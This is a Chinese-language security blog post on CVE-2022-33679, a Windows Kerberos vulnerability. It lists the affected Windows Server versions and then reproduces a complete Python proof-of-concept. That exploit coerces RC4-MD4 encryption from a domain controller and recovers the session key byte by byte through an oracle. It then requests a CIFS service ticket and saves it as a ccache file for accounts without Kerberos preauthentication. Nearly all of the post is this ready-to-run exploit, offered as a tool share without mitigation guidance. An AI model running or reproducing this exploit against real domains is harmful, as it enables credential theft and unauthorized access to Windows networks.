【CVE-2022-33679】Microsoft Windows Kerberos 安全漏洞POC

作者:Sec-Labs | 发布时间:

漏洞介绍

Microsoft Windows Kerberos是美国微软(Microsoft)公司的一个用于在网络集群中进行身份验证的软件。Kerberos 同时作为一种网络认证协议,其设计目标是通过密钥系统为客户机/服务器应用程序提供强大的认证服务。

Microsoft Windows Kerberos存在安全漏洞。以下产品和版本受到影响:Windows Server 2019,Windows Server 2019 (Server Core installation),Windows Server 2022,Windows Server 2022 (Server Core installation),Windows Server 2022 Azure Edition Core Hotpatch,Windows Server 2016,Windows Server 2016 (Server Core installation),Windows Server 2008 for 32-bit Systems Service Pack 2,Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation),Windows Server 2008 for x64-based Systems Service Pack 2,Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation),Windows Server 2008 R2 for x64-based Systems Service Pack 1,Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation),Windows Server 2012,Windows Server 2012 (Server Core installation),Windows Server 2012 R2,Windows Server 2012 R2 (Server Core installation)。

项目地址

https://github.com/Bdenneu/CVE-2022-33679

POC

CVE-2022-33679.py

import datetime
import random
import argparse
import logging
import sys
from binascii import hexlify, unhexlify

from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue

from impacket import version
from impacket.examples import logger
from impacket.examples.utils import parse_credentials

from impacket.krb5.kerberosv5 import KerberosError, sendReceive
from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, \
    PA_ENC_TS_ENC, AS_REP, EncryptedData, EncASRepPart, seq_set, \
    seq_set_iter, KERB_ERROR_DATA, HostAddress, HostAddresses, Ticket
from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REQ, TGS_REP, EncTGSRepPart
from impacket.krb5.types import KerberosTime, Principal
from impacket.krb5.types import Ticket as TTicket
from impacket.krb5 import constants
from impacket.krb5.crypto import Key
from impacket.krb5.ccache import Principal as CPrincipal
from impacket.krb5.ccache import CCache, Header, Credential, Times, CountedOctetString
try:
    from impacket.krb5.ccache import KeyBlockV4 as KeyBlock
except:
    from impacket.krb5.ccache import KeyBlock

from arc4 import ARC4

try:
    rand = random.SystemRandom()
except NotImplementedError:
    rand = random
    pass

class TGTBrute:
    def __init__(self, target, domain, servername, options):
        self.__user = target
        self.__domain = domain
        self.__servername = servername
        self.__options = options
        self.__kdcHost = options.dc_ip
        self.__asReq = None
        self.__reqBody = None
        self.__encodedPacRequest = None

    def prepareAsReq(self, requestPAC=True):
        rsadsi_rc4_md4 = -128
        self.__asReq = AS_REQ()

        domain = self.__domain.upper()
        serverName = Principal('krbtgt/%s'%domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
        userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
        pacRequest = KERB_PA_PAC_REQUEST()
        pacRequest['include-pac'] = requestPAC
        self.__encodedPacRequest = encoder.encode(pacRequest)

        self.__asReq['pvno'] = 5
        self.__asReq['msg-type'] =  int(constants.ApplicationTagNumbers.AS_REQ.value)
        self.__reqBody = seq_set(self.__asReq, 'req-body')

        opts = list()
        opts.append( constants.KDCOptions.forwardable.value )
        opts.append( constants.KDCOptions.renewable.value )
        opts.append( constants.KDCOptions.proxiable.value )
        self.__reqBody['kdc-options']  = constants.encodeFlags(opts)

        seq_set(self.__reqBody, 'sname', serverName.components_to_asn1)
        seq_set(self.__reqBody, 'cname', userName.components_to_asn1)

        if domain == '':
            raise Exception('Empty Domain not allowed in Kerberos')

        now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
        self.__reqBody['realm'] = domain
        self.__reqBody['till'] = KerberosTime.to_asn1(now)
        self.__reqBody['rtime'] = KerberosTime.to_asn1(now)
        self.__reqBody['nonce'] =  rand.getrandbits(31)
        supportedCiphers = (rsadsi_rc4_md4,)
        seq_set_iter(self.__reqBody, 'etype', supportedCiphers)

    def getTGT(self, requestPAC=True):
        self.prepareAsReq()
        self.__asReq['padata'] = noValue
        self.__asReq['padata'][0] = noValue
        self.__asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
        self.__asReq['padata'][0]['padata-value'] = self.__encodedPacRequest
        for i in range(20): # Add padding for more known bytes:
            addr = HostAddress()
            addr['addr-type']=1
            addr['address']=bytes([0,0,0,i])
            self.__reqBody['addresses'][i] = addr
        message = encoder.encode(self.__asReq)

        try:
            r = sendReceive(message, domain, self.__kdcHost)
        except KerberosError as e:
            if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
                logging.error(" RC4 is not supported")
                exit()
            else:
                raise
        return r

    def sendEncTs(self, data, requestPAC=True):
        self.prepareAsReq()

        encryptedData = EncryptedData()
        encryptedData['etype'] = -128
        encryptedData['cipher'] = data
        encodedEncryptedData = encoder.encode(encryptedData)

        self.__asReq['padata'] = noValue
        self.__asReq['padata'][0] = noValue
        self.__asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_ENC_TIMESTAMP.value)
        self.__asReq['padata'][0]['padata-value'] = encodedEncryptedData
        self.__asReq['padata'][1] = noValue
        self.__asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
        self.__asReq['padata'][1]['padata-value'] = self.__encodedPacRequest
        message = encoder.encode(self.__asReq)
        success = True
        try:
            r = sendReceive(message, domain, self.__kdcHost)
        except Exception as e:
            success = False
        return success

    def RecoverKey(self, encryptedAsREP):
        AsREPPlain = b'\x00'*24+b'y\x82\x02\x140\x82\x02\x10\xa0\x1b0\x19\xa0\x03\x02\x01\x80\xa1\x12\x04\x10'

        RC4Flow = bytes([AsREPPlain[i]^encryptedAsREP[i] for i in range(45)])
        #first byte of the key
        now = datetime.datetime.utcnow()
        Timestamp = (KerberosTime.to_asn1(now)).encode()
        sTimestamp = len(Timestamp)+1
        encodedTimeStamp = bytes([0 for i in range(24)])+bytes([0x30, sTimestamp+4, 0xa0, sTimestamp+2, 0x18, sTimestamp])+ Timestamp
        encryptedTimeStamp = bytes([RC4Flow[i]^encodedTimeStamp[i] for i in range(45)])
        found = False
        for i in range(256):
            if self.sendEncTs(encryptedTimeStamp+bytes([i])):
                RC4Flow += bytes([i])
                logging.info("Byte 0: %02x"%i)
                found = True
                break
        if found == False:
            logging.error("No matching byte")
            exit()
        for j in range(4):
            found = False
            encodedTimeStamp  = bytes([0 for i in range(24)])+bytes([0x30, 0x81+j])+bytes([0])*j
            encodedTimeStamp += bytes([sTimestamp+4, 0xa0, sTimestamp+2, 0x18, sTimestamp])+ Timestamp
            encryptedTimeStamp = bytes([RC4Flow[i]^encodedTimeStamp[i] for i in range(46+j)])
            for i in range(256):
                if self.sendEncTs(encryptedTimeStamp+bytes([i])):
                    RC4Flow += bytes([i])
                    logging.info("Byte %d: %02x"%(j+1, i))
                    found = True
                    break
            if found == False:
                logging.error("No matching byte")
                exit()
        key = bytes([RC4Flow[i]^encryptedAsREP[i] for i in range(45, 50)]+[0xab]*11)
        return key

    def TGTtoTGS(self, TGT, sessionKey):
        rsadsi_rc4_md4 = -128
        serverName = Principal('cifs/%s'%self.__servername, type=constants.PrincipalNameType.NT_SRV_INST.value)
        ticket = TTicket()
        ticket.from_asn1(TGT['ticket'])
        apReq = AP_REQ()
        apReq['pvno'] = 5
        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)

        opts = list()
        apReq['ap-options'] =  constants.encodeFlags(opts)
        seq_set(apReq,'ticket', ticket.to_asn1)

        authenticator = Authenticator()
        authenticator['authenticator-vno'] = 5
        authenticator['crealm'] = TGT['crealm'].asOctets()

        clientName = Principal()
        clientName.from_asn1( TGT, 'crealm', 'cname')

        seq_set(authenticator, 'cname', clientName.components_to_asn1)

        now = datetime.datetime.utcnow()
        authenticator['cusec'] =  now.microsecond
        authenticator['ctime'] = KerberosTime.to_asn1(now)

        encodedAuthenticator = encoder.encode(authenticator)

        cipher = ARC4(sessionKey[:8])
        encryptedEncodedAuthenticator = cipher.encrypt(b'\x00'*24+encodedAuthenticator)

        apReq['authenticator'] = noValue
        apReq['authenticator']['etype'] = rsadsi_rc4_md4
        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator

        encodedApReq = encoder.encode(apReq)

        tgsReq = TGS_REQ()

        tgsReq['pvno'] =  5
        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
        tgsReq['padata'] = noValue
        tgsReq['padata'][0] = noValue
        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
        tgsReq['padata'][0]['padata-value'] = encodedApReq

        reqBody = seq_set(tgsReq, 'req-body')

        opts = list()
        opts.append( constants.KDCOptions.forwardable.value )
        opts.append( constants.KDCOptions.renewable.value )
        opts.append( constants.KDCOptions.renewable_ok.value )
        opts.append( constants.KDCOptions.canonicalize.value )

        reqBody['kdc-options'] = constants.encodeFlags(opts)
        seq_set(reqBody, 'sname', serverName.components_to_asn1)
        reqBody['realm'] = domain

        now = datetime.datetime.utcnow() + datetime.timedelta(days=1)

        reqBody['till'] = KerberosTime.to_asn1(now)
        reqBody['nonce'] = rand.getrandbits(31)
        seq_set_iter(reqBody, 'etype',
                          (
                              int(constants.EncryptionTypes.rc4_hmac.value),
                              int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
                              int(constants.EncryptionTypes.des_cbc_md5.value),
                           )
                    )

        message = encoder.encode(tgsReq)
        r = sendReceive(message, self.__domain, self.__kdcHost)
        return r

    def TGSToCCache(self, TGS, sessionKey): #from CCache.fromTGT

        ccache = CCache()
        ccache.headers = []
        header = Header()
        header['tag'] = 1
        header['taglen'] = 8
        header['tagdata'] = b'\xff\xff\xff\xff\x00\x00\x00\x00'
        ccache.headers.append(header)
        tmpPrincipal = Principal()
        tmpPrincipal.from_asn1(TGS, 'crealm', 'cname')
        ccache.principal = CPrincipal()
        ccache.principal.fromPrincipal(tmpPrincipal)

        # Now let's add the credential
        encryptedTGSREP = bytes(TGS['enc-part']['cipher'])
        cipher = ARC4(sessionKey[:8])
        plainText = cipher.decrypt(bytes(encryptedTGSREP))[24:]
        encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]

        credential = Credential()
        server = Principal()
        server.from_asn1(encTGSRepPart, 'srealm', 'sname')
        tmpServer = CPrincipal()
        tmpServer.fromPrincipal(server)
        credential['client'] = ccache.principal
        credential['server'] = tmpServer
        credential['is_skey'] = 0

        credential['key'] = KeyBlock()
        credential['key']['keytype'] = int(encTGSRepPart['key']['keytype'])
        credential['key']['keyvalue'] = encTGSRepPart['key']['keyvalue'].asOctets()
        credential['key']['keylen'] = len(credential['key']['keyvalue'])

        credential['time'] = Times()
        credential['time']['authtime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['authtime']))
        credential['time']['starttime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['starttime']))
        credential['time']['endtime'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['endtime']))
        # after kb4586793 for cve-2020-17049 this timestamp may be omitted
        if encTGSRepPart['renew-till'].hasValue():
            credential['time']['renew_till'] = ccache.toTimeStamp(KerberosTime.from_asn1(encTGSRepPart['renew-till']))

        flags = ccache.reverseFlags(encTGSRepPart['flags'])
        credential['tktflags'] = flags

        credential['num_address'] = 0

        credential.ticket = CountedOctetString()
        credential.ticket['data'] = encoder.encode(TGS['ticket'].clone(tagSet=Ticket.tagSet, cloneValueFlag=True))
        credential.ticket['length'] = len(credential.ticket['data'])
        credential.secondTicket = CountedOctetString()
        credential.secondTicket['data'] = b''
        credential.secondTicket['length'] = 0
        ccache.credentials.append(credential)
        return ccache

    def run(self):
        logging.info("Getting TGT - Retrieving AS-REP")
        tgt  = self.getTGT()
        decodedtgt = decoder.decode(tgt, asn1Spec = AS_REP())[0]
        encryptedAsREP = bytes(decodedtgt['enc-part']['cipher'])
        logging.info("Trying to recover the RC4 Flow")
        sessionKey = self.RecoverKey(encryptedAsREP)
        logging.info("Recovered Session key: %s"%sessionKey.hex())
        TGS = self.TGTtoTGS(decodedtgt, sessionKey)
        logging.info("Got TGS for %s"%self.__servername)
        decodedtgs = decoder.decode(TGS, asn1Spec = TGS_REP())[0]
        ccache = self.TGSToCCache(decodedtgs, sessionKey)
        logging.info("Saving ticket in %s" % (self.__user+'_'+self.__servername+'.ccache'))
        ccache.saveFile(self.__user+'_'+self.__servername+'.ccache')

# Process command-line arguments.
if __name__ == '__main__':
    print(version.BANNER)

    parser = argparse.ArgumentParser(add_help = True, description = "Retrieve a TGT for a user having"
                                  "'Do not require Kerberos preauthentication' set and export their TGS of the given server")

    parser.add_argument('target', action='store', help='domain/username')
    parser.add_argument('serverName', action='store', help='server name')
    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    group = parser.add_argument_group('authentication')

    group.add_argument('-dc-ip', action='store',metavar = "ip address",  help='IP Address of the domain controller. If '
                                                                              'ommited it use the domain part (FQDN) '
                                                                              'specified in the target parameter')

    options = parser.parse_args()
    # Init the example's logger theme
    logger.init(options.ts)

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
        # Print the Library's installation path
        logging.debug(version.getInstallationPath())
    else:
        logging.getLogger().setLevel(logging.INFO)

    domain, username, password = parse_credentials(options.target)
    if domain == '':
        logging.critical('Domain should be specified!')
        sys.exit(1)

    try:
        executer = TGTBrute(username, domain, options.serverName, options)
        executer.run()
    except Exception as e:
        logging.debug("Exception:", exc_info=True)
        logging.error(str(e))

截图

8951dba439215834

 

标签:工具分享, 漏洞分享, POC脚本